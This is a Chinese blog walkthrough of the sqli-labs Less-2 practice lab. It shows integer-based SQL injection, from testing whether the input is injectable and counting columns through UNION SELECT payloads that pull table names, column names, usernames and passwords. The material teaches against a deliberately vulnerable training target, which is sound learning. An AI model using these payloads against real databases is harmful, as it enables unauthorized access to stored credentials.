[网络安全]sqli-labs Less-2 解题详析
往期回顾:[网络安全]sqli-labs Less-1 解题详析
判断注入类型
GET1 and 1=1
,回显如下:
GET1 and 1=2
,没有回显:
说明该漏洞类型为整型注入。
判断注入点个数
GET1 order by 3
,回显如下:
GET
1 order by 4
,回显如下:
说明注入点个数为3个
即可构造语句如下
-1' union select 1,2,xx form xx; --+
查库名
-1 union select 1,2,database(); --+
查表名
-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'; --+
查users表的列名
-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'; --+
查字段
-1 union select 1,group_concat(password),group_concat(username) from security.users; --+
注意
group_concat(password)的回显点在第二点上,对应回显页面中的Your Login name
group_concat(username)的回显点在第三点上,对应回显页面中的Your Password
除此之外,可以单独查询username和password
,如下:
-1 union select 1,2,group_concat(username) from security.users; --+
该页面回显即为用户名;
-1 union select 1,2,group_concat(password) from security.users; --+
该页面回显即为密码。
总结
以上为[网络安全]sqli-labs Less-2 解题详析,后续将分享[网络安全]sqli-labs Less-3 解题详析
原理及姿势可参考:[网络安全]SQL注入原理及常见攻击方法简析
我是秋说,我们下次见。
本文作者:秋说
本文链接:https://www.cnblogs.com/qiushuo/p/17454570.html
版权声明:本作品采用知识共享署名-非商业性使用-禁止演绎 2.5 中国大陆许可协议进行许可。
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步